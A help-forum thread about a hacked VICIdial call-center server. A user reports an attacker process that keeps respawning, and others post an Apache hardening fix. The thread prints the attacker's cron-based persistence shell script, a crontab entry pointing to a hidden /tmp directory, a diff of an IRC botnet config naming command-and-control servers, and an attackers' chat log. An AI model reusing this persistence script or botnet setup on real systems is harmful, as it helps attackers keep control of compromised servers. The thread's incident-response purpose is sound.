"Your server has been hacked. read more here: viewtopic.php?t=25534 Regards DomeDan. if the link is broken then look for the thread on the vicidial forum its named: We were hacked Security vulnerability in lead loader"
nano /etc/apache2/sites-available/default
nano /etc/apache2/default-server.conf
Allow from all
</Directory>
Allow from all
<FilesMatch "\.(log|txt)$">
Order allow,deny
Deny from all
</FilesMatch>
</Directory>
/etc/init.d/apache2 restart
I came into work this morning to find a new campaign created by you stating my dialer had been hacked. I have went thru the entire thread you linked in the campaign, however I am unable to remove the vici.txt(doesnt exist) or the wwwrun program(keeps changing numbers). Im going to be adding a whitelist style to IPTables, as this was a recent install, however Id like to stop any other intrusion before the IPTABLES whitelist is created. Any suggestions?
vicibox:~/ # ps aux | grep wwwrun # !! Replace wwwrun with apache if your running goautodial !!
wwwrun 12708 0.0 0.0 100836 5576 ? S Aug04 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 12712 0.0 0.0 101284 7924 ? S Aug04 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 12713 0.0 0.0 100836 5584 ? S Aug04 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 12714 0.0 0.0 100836 5584 ? S Aug04 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 12715 0.0 0.1 103084 8576 ? S Aug04 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 12717 0.0 0.0 100836 5580 ? S Aug04 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 12718 0.0 0.1 106392 12892 ? S Aug04 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 12719 0.0 0.1 106392 12892 ? S Aug04 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 12720 0.0 0.0 101284 7920 ? S Aug04 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
root 18810 0.0 0.0 3612 720 pts/2 S+ 03:36 0:00 grep wwwrun
wwwrun 19500 0.0 0.1 103580 10452 ? S Jul31 0:00 /usr/sbin/httpd2-prefork -f /etc/apache2/httpd.conf
wwwrun 24877 0.1 0.0 8868 5032 ? S Aug05 3:49 init [3]
wwwrun 25712 0.1 0.0 8868 5036 ? S Aug05 3:49 init [3]
#!/bin/sh
pwd > dir.dir
dir=$(cat dir.dir)
echo "* * * * * $dir/update >/dev/null 2>&1" > cron.d
crontab cron.d
crontab -l | grep update
echo "#!/bin/sh
if test -r $dir/mech.pid; then
pid=\$(cat $dir/mech.pid)
if \$(kill -CHLD \$pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd $dir
./start.sh &>/dev/null" > update
chmod u+x update
vicibox:~ # crontab -u wwwrun -l
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (cron.d installed on Wed Jul 18 08:11:39 2012)
# (Cron version V5.0 -- $Id: crontab.c,v 1.12 2004/01/23 18:56:42 vixie Exp $)
* * * * * /tmp/.z/.sh3ll/update >/dev/null 2>&1
--- vici_1.txt 2012-07-29 18:56:02.000000000 +0200
+++ vici_2.txt 2012-08-05 17:54:41.000000000 +0200
@@ -35,3 +35,3 @@
-my @channels=("#vici");
-my $nick='legend';
-my $ircname ='vici';
+my @channels=("#legend");
+my $nick='[vici]-';
+my $ircname ='legend';
@@ -39,2 +39,2 @@
-my $server='space.legendteam.info';
-my $port='6667';
+my $server='chaos.legendteam.info';
+my $port='1234';
01:22 <@god> 3al asterisk
01:22 <@god> i have access
01:22 <@god> to 5 roots
01:22 <@god> of the company
01:23 <@Arz> good
01:23 <@Arz> hala2a all my bots out ya bro
Users browsing this forum: Google [Bot] and 129 guests